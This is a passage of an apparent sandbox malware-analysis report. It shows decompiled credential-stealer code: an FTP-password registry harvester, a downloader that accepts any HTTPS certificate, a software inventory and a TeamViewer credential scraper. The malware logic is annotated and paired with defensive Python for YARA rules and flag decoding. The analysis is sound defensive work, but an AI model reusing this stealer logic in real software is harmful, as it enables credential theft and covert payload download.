                                                                                                                                         				E1000547E(_a4, _a8, "Server.Pass", "Server.Host", "Server.User", "Server.Port", "Path", "ServerType", 0xbeef0013); // executed  -- second value layout, same key
                                                                                                                                         				E1000547E(_a4, _a8, "Last Server Pass", "Last Server Host", "Last Server User", "Last Server Port", "Last Server Path", "Last Server Type", 0xbeef0014); // executed  -- "Last Server" layout
                                                                                                                                         				_t28 = RegOpenKeyA( *0x1000f159, _a8,  &_v8); // executed  -- root hive handle is read from a global, not a literal HKEY
                                                                                                                                         				_t29 = _t28;
                                                                                                                                         				if(_t29 == 0) {
                                                                                                                                         					_v12 = 0;
                                                                                                                                         					while(1) {
                                                                                                                                         						_v16 = 0x7ff; // subkey name buffer: 0x7ff chars into the 2048-byte stack buffer _v2064
                                                                                                                                         						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                                                                                         							break; // ERROR_NO_MORE_ITEMS (or any other error) ends the walk
                                                                                                                                         						}
                                                                                                                                         						_v2068 = E10001E05(E10001DB1(_a8, "\\"),  &_v2064); // builds "<_a8>\<subkey>" (string helpers, inferred from their use)
                                                                                                                                         						E100055DE(_a4, _v2068); // recurse: every subkey gets the same three value lookups
                                                                                                                                         						E10001871(_v2068); // release the built path (inferred)
                                                                                                                                         						_v12 = _v12 + 1;
                                                                                                                                         					}
                                                                                                                                         					return RegCloseKey(_v8);
                                                                                                                                         				}
                                                                                                                                        				}
                                                                                                                                        				return _t29;
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 1000567E
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 100056AE
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 100056FC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseEnumOpen
                                                                                                                                        • String ID: Host$Last Server Host$Last Server Pass$Last Server Path$Last Server Port$Last Server Type$Last Server User$Pass$Path$Port$Remote Dir$Server Type$Server.Host$Server.Pass$Server.Port$Server.User$ServerType$User
                                                                                                                                        • API String ID: 1332880857-44262141
                                                                                                                                        • Opcode ID: f3efa3730acde74ca495cc44bc5decd4432eefe23de8df1c8b43d3691a3a0a8b
                                                                                                                                        • Instruction ID: 6d95f290119b40ac15707efb5ddcc29840c3e7dc599f6a7b4c5405ef800f93dc
                                                                                                                                        • Opcode Fuzzy Hash: f3efa3730acde74ca495cc44bc5decd4432eefe23de8df1c8b43d3691a3a0a8b
                                                                                                                                        • Instruction Fuzzy Hash: E621FA3590410DBAFB21DFA0CC01FED7B6BEB043C1F50816AB6547586EDB72AA50BB80
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 16.53%
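The String ID field above lists the exact registry value names E100055DE looks up, which is the kind of artifact a defender turns into a detection. The following Python is an added example for reading this report, not Joe Sandbox output and not Pony code: it takes the String ID value copied from the metadata above, drops the names too generic to be selective, renders a YARA rule from the rest, and checks the rule's condition against two byte buffers constructed here (they are not taken from the sample).

```python
"""Build a YARA rule from a Joe Sandbox "String ID" field and sanity-check it.

Added example for reading this report; it is not Joe Sandbox or Pony code.
STRING_ID is copied from the E100055DE metadata above. The two byte blobs at
the bottom are constructed here to exercise the rule, not taken from the sample.
"""

# Copied verbatim from the report's "String ID" line for E100055DE ('$'-separated).
STRING_ID = (
    "Host$Last Server Host$Last Server Pass$Last Server Path$Last Server Port"
    "$Last Server Type$Last Server User$Pass$Path$Port$Remote Dir$Server Type"
    "$Server.Host$Server.Pass$Server.Port$Server.User$ServerType$User"
)


def split_string_id(field: str, min_len: int = 6) -> list[str]:
    """Split the '$'-separated field and drop strings too short to be selective.

    "Host", "Pass", "Port", "User" occur in countless benign binaries; the dotted
    and "Last Server ..." names are what make this routine recognisable.
    """
    return sorted({s for s in field.split("$") if len(s) >= min_len})


def yara_escape(s: str) -> str:
    return s.replace("\\", "\\\\").replace('"', '\\"')


def yara_rule(name: str, strings: list[str], min_hits: int) -> str:
    """Render a rule that fires when at least min_hits of the strings are present."""
    lines = [f"rule {name}", "{", "    strings:"]
    for i, s in enumerate(strings):
        lines.append(f'        $s{i} = "{yara_escape(s)}" ascii')
    lines += ["    condition:", f"        {min_hits} of ($s*)", "}"]
    return "\n".join(lines)


def count_hits(blob: bytes, strings: list[str]) -> int:
    """Mirror the rule's condition on a raw buffer: how many strings occur in it."""
    return sum(1 for s in strings if s.encode("ascii") in blob)


def matches(blob: bytes, strings: list[str], min_hits: int) -> bool:
    return count_hits(blob, strings) >= min_hits


# Constructed inputs (not from the sample): a fake memory region with the value
# names laid out NUL-separated as they would sit in a binary, and a benign buffer
# that only carries the generic names.
SUSPECT_DUMP = b"\x00".join(s.encode() for s in split_string_id(STRING_ID)) + b"\x00"
BENIGN_DUMP = b"Host\x00Port\x00User\x00Server Type\x00"

if __name__ == "__main__":
    selected = split_string_id(STRING_ID)
    print(yara_rule("Pony_ftp_profile_registry_names", selected, min_hits=4))
    print("suspect:", matches(SUSPECT_DUMP, selected, 4),
          "benign:", matches(BENIGN_DUMP, selected, 4))
```

The `min_hits` threshold matters more than the string list: a single dotted name such as "Server.Host" is plausible in a legitimate FTP client's own binary, so the rule should require several of them together before it is used for anything beyond hunting.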

                                                                                                                                         Control-flow Graph

                                                                                                                                         (Interactive graph not reproduced. Its basic blocks, in execution order, call InternetCrackUrlA, InternetConnectA, HttpOpenRequestA, InternetQueryOptionA and InternetSetOptionA on the HTTPS path, HttpSendRequestA, HttpQueryInfoA, a loop around InternetReadFile, and InternetCloseHandle on the request and connection handles.)
                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                        			E02441AB0(char* _a4, void* _a8, long _a12, DWORD** _a16) {
                                                                                                                                        				void* _v8;
                                                                                                                                        				void* _v12;
                                                                                                                                        				long _v16;
                                                                                                                                        				signed int _v20;
                                                                                                                                        				void _v24;
                                                                                                                                        				signed short _v28;
                                                                                                                                        				void _v32;
                                                                                                                                        				void* _v36;
                                                                                                                                        				long _v40;
                                                                                                                                        				long _v44;
                                                                                                                                        				int _v48;
                                                                                                                                        				DWORD* _v52;
                                                                                                                                        				char* _v56;
                                                                                                                                        				intOrPtr _v68;
                                                                                                                                        				char* _v72;
                                                                                                                                        				signed short _v92;
                                                                                                                                        				intOrPtr _v96;
                                                                                                                                        				char* _v100;
                                                                                                                                        				long _v104;
                                                                                                                                        				void* _v116;
                                                                                                                                        				char _v376;
                                                                                                                                        				char _v636;
                                                                                                                                        				int _t77;
                                                                                                                                        				void* _t78;
                                                                                                                                        				void* _t80;
                                                                                                                                        				int _t94;
                                                                                                                                        
                                                                                                                                         				_v56 = "*/*"; // lplpszAcceptTypes for HttpOpenRequestA: one entry, NULL-terminated by _v52
                                                                                                                                         				_v52 = 0;
                                                                                                                                         				E024414A0( &_v116, 0, 0x3c); // zero a URL_COMPONENTS struct (0x3c = its 32-bit size); memset-like helper, inferred
                                                                                                                                         				_v116 = 0x3c; // dwStructSize
                                                                                                                                         				_v100 =  &_v376; // lpszHostName
                                                                                                                                         				_v96 = 0x104; // dwHostNameLength = MAX_PATH
                                                                                                                                         				_v72 =  &_v636; // lpszUrlPath
                                                                                                                                         				_v68 = 0x104; // dwUrlPathLength
                                                                                                                                         				_t77 = InternetCrackUrlA(_a4, 0, 0,  &_v116); // executed
                                                                                                                                         				if(_t77 != 0) {
                                                                                                                                         					if(_v104 == 0) { // nScheme
                                                                                                                                         						_v104 = 3; // default to INTERNET_SCHEME_HTTP
                                                                                                                                         					}
                                                                                                                                         					if(_v104 == 3 || _v104 == 4) { // http or https only
                                                                                                                                         						_t78 = E02441EA0(); // executed  -- returns the session handle used by InternetConnectA (body not shown here)
                                                                                                                                         						_v36 = _t78;
                                                                                                                                         						if(_v36 != 0) {
                                                                                                                                         							_v28 = _v92; // nPort from URL_COMPONENTS
                                                                                                                                         							_v20 = 0x84080100; // INTERNET_FLAG_RELOAD | NO_CACHE_WRITE | NO_COOKIES | PRAGMA_NOCACHE
                                                                                                                                         							if(_v104 == 4) {
                                                                                                                                         								_v20 = _v20 | 0x00803000; // | INTERNET_FLAG_SECURE | IGNORE_CERT_DATE_INVALID | IGNORE_CERT_CN_INVALID
                                                                                                                                         							}
                                                                                                                                         							_t80 = InternetConnectA(_v36,  &_v376, _v28 & 0x0000ffff, 0, 0, 3, 0, 1); // executed  -- 3 = INTERNET_SERVICE_HTTP
                                                                                                                                         							_v12 = _t80;
                                                                                                                                         							if(_v12 != 0) {
                                                                                                                                         								_v8 = HttpOpenRequestA(_v12, "GET",  &_v636, 0, 0,  &_v56, _v20, 1);
                                                                                                                                         								if(_v8 != 0) {
                                                                                                                                         									if(_v104 == 4) {
                                                                                                                                         										_v44 = 4;
                                                                                                                                         										InternetQueryOptionA(_v8, 0x1f,  &_v24,  &_v44); // 0x1f = INTERNET_OPTION_SECURITY_FLAGS
                                                                                                                                         										_v24 = _v24 | 0x00001100; // SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID
                                                                                                                                         										InternetSetOptionA(_v8, 0x1f,  &_v24, 4); // any certificate is accepted on the HTTPS path
                                                                                                                                         									}
                                                                                                                                         									HttpSendRequestA(_v8, 0, 0, 0, 0);
                                                                                                                                         									_v32 = 0;
                                                                                                                                         									_v40 = 4;
                                                                                                                                         									HttpQueryInfoA(_v8, 0x20000013,  &_v32,  &_v40, 0); // HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER
                                                                                                                                         									if(_v32 != 0xc8 || _a8 == 0) { // 0xc8 = HTTP 200; a NULL _a8 means status check only, no body read
                                                                                                                                        										L26:
                                                                                                                                        										InternetCloseHandle(_v8); // executed
                                                                                                                                        										InternetCloseHandle(_v12);
                                                                                                                                        										if(_v32 != 0xc8) {
                                                                                                                                        											return 0;
                                                                                                                                        										}
                                                                                                                                        										return 1;
                                                                                                                                        									} else {
                                                                                                                                        										 *_a16 = 0;
                                                                                                                                        										while(1 != 0) {
                                                                                                                                        											_t94 = InternetReadFile(_v8, _a8, _a12,  &_v16); // executed
                                                                                                                                        											_v48 = _t94;
                                                                                                                                        											if(_v48 != 1 || _v16 <= 0) {
                                                                                                                                        												goto L26;
                                                                                                                                        											} else {
                                                                                                                                        												_a8 = _a8 + _v16;
                                                                                                                                        												_a12 = _a12 - _v16;
                                                                                                                                        												 *_a16 =  *_a16 + _v16;
                                                                                                                                        												continue;
                                                                                                                                        											}
                                                                                                                                        										}
                                                                                                                                        										goto L26;
                                                                                                                                        									}
                                                                                                                                        								}
                                                                                                                                        								InternetCloseHandle(_v12);
                                                                                                                                        								return 0;
                                                                                                                                        							} else {
                                                                                                                                        								return 0;
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        						return 0;
                                                                                                                                        					} else {
                                                                                                                                        						return 0;
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				return 0;
                                                                                                                                        			}
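The security-relevant facts in E02441AB0 are hidden in literal constants: the HttpOpenRequestA flag word, the option-31 patch and the HttpQueryInfoA level. The Python below is an added example for reading this report, not Hancitor code and not Joe Sandbox output. The bit tables are the documented wininet.h values; the numbers fed into the functions are the literals copied from the listing above. It reproduces the flag computation for both schemes, names every bit, and answers the question an analyst actually has: does this downloader validate the server certificate?

```python
"""Decode the WinINet constants that appear as literals in E02441AB0 above.

Added example for reading this report; it is not Hancitor or Joe Sandbox code.
The bit tables are the documented wininet.h values; the numeric inputs in the
functions below are the literals copied from the decompiled listing.
"""

# HttpOpenRequestA dwFlags (wininet.h)
OPEN_REQUEST_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x10000000: "INTERNET_FLAG_ASYNC",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x01000000: "INTERNET_FLAG_FROM_CACHE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00040000: "INTERNET_FLAG_NO_AUTH",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000400: "INTERNET_FLAG_HYPERLINK",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}

# Bits of INTERNET_OPTION_SECURITY_FLAGS (option 0x1f = 31)
SECURITY_FLAGS = {
    0x00000080: "SECURITY_FLAG_IGNORE_REVOCATION",
    0x00000100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x00000200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x00001000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x00002000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00004000: "SECURITY_FLAG_IGNORE_REDIRECT_TO_HTTPS",
    0x00008000: "SECURITY_FLAG_IGNORE_REDIRECT_TO_HTTP",
}

INTERNET_SCHEME_HTTP, INTERNET_SCHEME_HTTPS = 3, 4
HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE = 0x20000000, 19

CERT_BYPASS_BITS = {
    "INTERNET_FLAG_IGNORE_CERT_CN_INVALID", "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    "SECURITY_FLAG_IGNORE_UNKNOWN_CA", "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID", "SECURITY_FLAG_IGNORE_REVOCATION",
}


def decode_flags(value: int, table: dict) -> tuple[list[str], int]:
    """Names of the set bits found in table (high bit first), plus unknown leftover bits."""
    names = [name for bit, name in sorted(table.items(), reverse=True) if value & bit]
    known = sum(bit for bit in table if value & bit)
    return names, value & ~known


def effective_flags(scheme: int, security_before: int = 0) -> tuple[int, int]:
    """(HttpOpenRequestA dwFlags, option-31 value) exactly as E02441AB0 sets them.

    Literals copied from the listing: base 0x84080100; for nScheme == 4 the code
    ORs 0x00803000 into the flags and 0x1100 into INTERNET_OPTION_SECURITY_FLAGS.
    """
    flags, security = 0x84080100, security_before
    if scheme == INTERNET_SCHEME_HTTPS:
        flags |= 0x00803000
        security |= 0x00001100
    return flags, security


def cert_validation_disabled(scheme: int, security_before: int = 0) -> bool:
    """True if the request would accept an untrusted CA, wrong CN or expired certificate."""
    flags, security = effective_flags(scheme, security_before)
    names = decode_flags(flags, OPEN_REQUEST_FLAGS)[0] + decode_flags(security, SECURITY_FLAGS)[0]
    return scheme == INTERNET_SCHEME_HTTPS and bool(CERT_BYPASS_BITS & set(names))


def decode_query_info(level: int) -> tuple[str, bool]:
    """Split an HttpQueryInfoA dwInfoLevel into (header name, value returned as a DWORD?)."""
    as_number = bool(level & HTTP_QUERY_FLAG_NUMBER)
    header = {HTTP_QUERY_STATUS_CODE: "HTTP_QUERY_STATUS_CODE"}.get(level & 0xFFFF, "unknown")
    return header, as_number


if __name__ == "__main__":
    for scheme in (INTERNET_SCHEME_HTTP, INTERNET_SCHEME_HTTPS):
        flags, security = effective_flags(scheme)
        print(f"scheme {scheme}: dwFlags=0x{flags:08x}", decode_flags(flags, OPEN_REQUEST_FLAGS)[0])
        print(f"  option 0x1f=0x{security:04x}", decode_flags(security, SECURITY_FLAGS)[0])
        print("  cert validation disabled:", cert_validation_disabled(scheme))
    print("HttpQueryInfoA 0x20000013 ->", decode_query_info(0x20000013), "compared against 0xc8 =", 0xc8)
```

For a defender the decoded output says three things the raw listing does not: the HTTPS branch will happily talk to a TLS-intercepting proxy presenting any certificate, so the payload fetch can be inspected in plaintext; the request is sent without cookies and with the caching flags that add a Pragma: no-cache header, which is a usable fingerprint next to the bare "GET" and "*/*" accept type; and the function treats anything other than HTTP 200 as failure, so a sinkhole that returns 404 stops the download loop without the sample ever reading a body.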





























[Per-line instruction address column omitted; the function above spans 0x02441ab9 .. 0x02441ce4 in the 0x02440000 svchost memory region referenced below.]

                                                                                                                                        APIs
                                                                                                                                        • InternetCrackUrlA.WININET(00000020,00000000,00000000,0000003C), ref: 02441B0A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CrackInternet
                                                                                                                                        • String ID: */*$<$GET
                                                                                                                                        • API String ID: 1381609488-4180448669
                                                                                                                                        • Opcode ID: 684ee62394becf589aa6934e47f279506a5695f94c59b23791e841dd1c699cce
                                                                                                                                        • Instruction ID: f42a422ae97422749960feebd0d92a5d8cebef12a3031aa3fcdca2a4aeab6e93
                                                                                                                                        • Opcode Fuzzy Hash: 684ee62394becf589aa6934e47f279506a5695f94c59b23791e841dd1c699cce
                                                                                                                                        • Instruction Fuzzy Hash: 50710AB5D40209EBEB14CFE4CD49BEEB7B4BB48704F10451AE619AB280DB749A94CF54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 87%
			// Annotation: installed-software inventory. The routine walks
			// HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, collects every
			// subkey's UninstallString into one buffer (_v4116) and subkey name plus
			// DisplayName into a second (_v4120), runs both through L1000BA64 and copies
			// the results into the globals at 0x1000f0dd and 0x1000f0e1.
			E10002074(void* __ebx, int* __ecx, void* __edx) {
                                                                                                                                        				void* _v8;
                                                                                                                                        				char _v4104;
                                                                                                                                        				int _v4108;
                                                                                                                                        				int _v4112;
                                                                                                                                        				char _v4116;
                                                                                                                                        				char _v4120;
                                                                                                                                        				int _v4124;
                                                                                                                                        				void* _v4128;
                                                                                                                                        				intOrPtr _v4132;
                                                                                                                                        				void* __ebp;
                                                                                                                                        				long _t56;
                                                                                                                                        				void** _t60;
                                                                                                                                        				void* _t61;
                                                                                                                                        				void* _t71;
                                                                                                                                        				long _t76;
                                                                                                                                        				void* _t80;
                                                                                                                                        				intOrPtr _t83;
                                                                                                                                        				void* _t85;
                                                                                                                                        				void* _t86;
                                                                                                                                        				void* _t90;
                                                                                                                                        				void* _t91;
                                                                                                                                        				void* _t102;
                                                                                                                                        				void* _t107;
                                                                                                                                        				int* _t108;
                                                                                                                                        				void* _t112;
                                                                                                                                        				void* _t115;
                                                                                                                                        				void* _t120;
                                                                                                                                        
                                                                                                                                        				_t111 = __edx;
                                                                                                                                        				_t108 = __ecx;
                                                                                                                                        				_t107 = __ebx;
				// free any inventory left from a previous run before rebuilding it
				if( *0x1000f0dd != 0) {
					E10001871( *0x1000f0dd);
					 *0x1000f0dd = 0;
				}
				if( *0x1000f0e1 != 0) {
					E10001871( *0x1000f0e1);
					 *0x1000f0e1 = 0;
				}
				// initialise the two collection buffers
				E10001000( &_v4116, _t108, _t111,  &_v4116); // executed
				E10001000( &_v4120, _t108, _t111,  &_v4120);
				// 0x80000002 == HKEY_LOCAL_MACHINE
				_t56 = RegOpenKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall",  &_v8); // executed
                                                                                                                                        				if(_t56 != 0) {
                                                                                                                                        					L19:
                                                                                                                                        					E10001522(_v4116, 0);
                                                                                                                                        					E10001522(_v4120, 0);
					// L1000BA64 post-processes the uninstall-string buffer; on success
					// it leaves a global memory handle in _v4128 that is locked and copied
					// into the 0x1000f0dd global below
					_t60 =  &_v4128;
					_push(_t60);
					_push(_v4116);
					L1000BA64();
					if(_t60 >= 0) {
                                                                                                                                        						_v4124 = E10001091(_t60, _t107, _t111, _v4116);
                                                                                                                                        						 *0x1000f0dd = E10001888(_v4124);
                                                                                                                                        						_t71 = GlobalLock(_v4128);
                                                                                                                                        						if(_t71 != 0) {
                                                                                                                                        							_t115 =  *0x1000f0dd; // 0x2874ff8
                                                                                                                                        							memcpy(_t115, _t71, _v4124);
                                                                                                                                        							_t120 = _t120 + 0xc;
                                                                                                                                        							_t108 = 0;
                                                                                                                                        							GlobalUnlock(_v4128);
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        					_t61 =  &_v4128;
                                                                                                                                        					_push(_t61);
                                                                                                                                        					_push(_v4120);
                                                                                                                                        					L1000BA64();
                                                                                                                                        					if(_t61 >= 0) {
                                                                                                                                        						_v4124 = E10001091(_t61, _t107, _t111, _v4120);
                                                                                                                                        						 *0x1000f0e1 = E10001888(_v4124);
                                                                                                                                        						_t61 = GlobalLock(_v4128);
                                                                                                                                        						if(_t61 != 0) {
                                                                                                                                        							_t112 =  *0x1000f0e1; // 0x286d9a8
                                                                                                                                        							memcpy(_t112, _t61, _v4124);
                                                                                                                                        							_t108 = 0;
                                                                                                                                        							_t61 = GlobalUnlock(_v4128);
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        					return E10001026(E10001026(_t61, _t107, _t108, _t111, _v4116), _t107, _t108, _t111, _v4120);
                                                                                                                                        				}
                                                                                                                                        				_v4112 = 0;
                                                                                                                                        				while(1) {
					// enumerate Uninstall subkeys by index (_v4112); name lands in _v4104
					_v4108 = 0xfff;
					_t76 = RegEnumKeyExA(_v8, _v4112,  &_v4104,  &_v4108, 0, 0, 0, 0); // executed
                                                                                                                                        					if(_t76 != 0) {
                                                                                                                                        						break;
                                                                                                                                        					}
                                                                                                                                        					_t80 = E10001DB1("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", "\\");
                                                                                                                                        					if(_t80 != 0) {
                                                                                                                                        						_t111 = _t80;
                                                                                                                                        						_t83 = E10001E05(_t80,  &_v4104);
                                                                                                                                        						if(_t83 != 0) {
                                                                                                                                        							_v4132 = _t83;
							// read Uninstall\<subkey>\UninstallString (size returned in _v4124);
							// entries without one contribute nothing to either buffer
							_t85 = E10001D2A(0x80000002, _v4132, "UninstallString",  &_v4124); // executed
							_t86 = _t85;
							if(_t86 != 0 && _t86 > 1) {
								_push(_t86);
								E10001537(_v4116, _t86, _v4124);
								_t90 = E10001D2A(0x80000002, _v4132, "DisplayName",  &_v4124); // executed
								_t91 = _t90;
								if(_t91 == 0 || _v4124 <= 1) {
									// no DisplayName: subkey name with its terminator
									E10001537(_v4120,  &_v4104, lstrlenA( &_v4104) + 1);
								} else {
									// subkey name without terminator, immediately followed by the
									// NUL-terminated DisplayName
									_push(_t91);
									E10001537(_v4120,  &_v4104, lstrlenA( &_v4104));
									_t102 = _t91;
									E10001537(_v4120, _t102, _v4124);
                                                                                                                                        									E10001871();
                                                                                                                                        								}
                                                                                                                                        								E10001871();
                                                                                                                                        							}
                                                                                                                                        							E10001871(_v4132);
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        					_v4112 = _v4112 + 1;
                                                                                                                                        				}
                                                                                                                                        				RegCloseKey(_v8); // executed
                                                                                                                                        				goto L19;
			}

                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,?), ref: 100020E1
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 10002121
                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF), ref: 100021D4
                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000), ref: 1000220D
                                                                                                                                          • Part of subcall function 10001871: LocalFree.KERNEL32(00000000,?,10002A7A,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 1000187D
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 10002244
                                                                                                                                        • GetHGlobalFromStream.OLE32(?,?,?,?), ref: 10002270
                                                                                                                                        • GlobalLock.KERNEL32 ref: 100022A0
                                                                                                                                        • GlobalUnlock.KERNEL32(?,?,?,?,?,?,?,?), ref: 100022BF
                                                                                                                                        • GetHGlobalFromStream.OLE32(?,?,?,?,?,?), ref: 100022D1
                                                                                                                                        • GlobalLock.KERNEL32 ref: 10002301
                                                                                                                                        • GlobalUnlock.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 10002320
                                                                                                                                          • Part of subcall function 10001888: LocalAlloc.KERNEL32(00000040,-00000080,?,10002A53,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10001896
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$FromLocalLockStreamUnlocklstrlen$AllocCloseEnumFreeOpen
                                                                                                                                        • String ID: DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                                                        • API String ID: 4234118056-981893429
                                                                                                                                        • Opcode ID: 886ac1c5b7089cb042fa2ad9ff482cc2f72178973f07270dfac66da2e0bb7df9
                                                                                                                                        • Instruction ID: da10a617b2e8e93210762bf69878d03a319c025929bf0975a5fdd943acd04647
                                                                                                                                        • Opcode Fuzzy Hash: 886ac1c5b7089cb042fa2ad9ff482cc2f72178973f07270dfac66da2e0bb7df9
                                                                                                                                        • Instruction Fuzzy Hash: 7D611075C00168BAFB31DB60CC45BED7679EB043C0F1044E5B689A106ADBB5AFD4AF61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.15%

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                        			E100099A4(void* __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                        				intOrPtr _v8;
                                                                                                                                        				struct HWND__* _v12;
                                                                                                                                        				struct HWND__* _v16;
                                                                                                                                        				struct HWND__* _v20;
                                                                                                                                        				CHAR* _v24;
                                                                                                                                        				long _v28;
                                                                                                                                        				long _v32;
                                                                                                                                        				intOrPtr _v36;
                                                                                                                                        				struct HWND__* _t59;
                                                                                                                                        				struct HWND__* _t60;
                                                                                                                                        				struct HWND__* _t66;
                                                                                                                                        				struct HWND__* _t68;
                                                                                                                                        				struct HWND__* _t69;
                                                                                                                                        				struct HWND__* _t70;
                                                                                                                                        				int _t71;
                                                                                                                                        				CHAR* _t73;
                                                                                                                                        				char* _t74;
                                                                                                                                        				long _t79;
                                                                                                                                        				long _t84;
                                                                                                                                        				struct HWND__* _t90;
                                                                                                                                        				long _t92;
                                                                                                                                        				void* _t96;
                                                                                                                                        				void* _t97;
                                                                                                                                        				void* _t98;
                                                                                                                                        
                                                                                                                                        				_t98 = __edx;
                                                                                                                                        				_t97 = __ecx;
                                                                                                                                        				_t96 = __ebx;
                                                                                                                                        				_v8 = E100015A9(_a4, 0x86, 0);
                                                                                                                                        				_v28 = E10001888(0x40);
                                                                                                                                        				_v32 = E10001888(0x40);
                                                                                                                                        				_v24 = E10001888(0x40);
                                                                                                                                        				_t59 = FindWindowExA(0, 0, 0, "TeamViewer"); // executed
                                                                                                                                        				_t60 = _t59;
                                                                                                                                        				if(_t60 == 0) {
                                                                                                                                        					L15:
                                                                                                                                        					E100015EF(_t96, _t97, _t98, _t104, _a4, _v8);
                                                                                                                                        					E10001871(_v28);
                                                                                                                                        					E10001871(_v32);
                                                                                                                                        					return E10001871(_v24);
                                                                                                                                        				}
                                                                                                                                        				_v12 = _t60;
                                                                                                                                        				_v16 = 0;
                                                                                                                                        				_v20 = 0;
                                                                                                                                        				_t66 = FindWindowExA(_v12, _v16, 0x8002, 0);
                                                                                                                                        				if(_t66 == 0) {
                                                                                                                                        					goto L15;
                                                                                                                                        				}
                                                                                                                                        				_v16 = _t66;
                                                                                                                                        				_t68 = FindWindowExA(_v16, _v20, "Edit", 0);
                                                                                                                                        				if(_t68 == 0) {
                                                                                                                                        					_t69 = FindWindowExA(_v16, 0, 0, 0);
                                                                                                                                        					while(1) {
                                                                                                                                        						_t70 = _t69;
                                                                                                                                        						__eflags = _t70;
                                                                                                                                        						if(__eflags == 0) {
							goto L15;
						}
						_v12 = _t70;
						_t71 = GetClassNameA(_t70, _v24, 0x40);
						__eflags = _t71;
						if(_t71 == 0) {
							L13:
							_t69 = FindWindowExA(_v16, _v12, 0, 0);
							continue;
						}
						_t73 = _v24;
						__eflags =  *_t73 - 0x41;
						if( *_t73 != 0x41) {
							goto L13;
						}
						_t74 =  &(_t73[1]);
						__eflags =  *_t74 - 0x54;
						if( *_t74 != 0x54) {
							goto L13;
						}
						__eflags = _t74[1] - 0x4c;
						if(_t74[1] != 0x4c) {
							goto L13;
						}
						SendMessageW(_v12, 0xd, 0x40, _v28);
						_push(E10002A83(_v28));
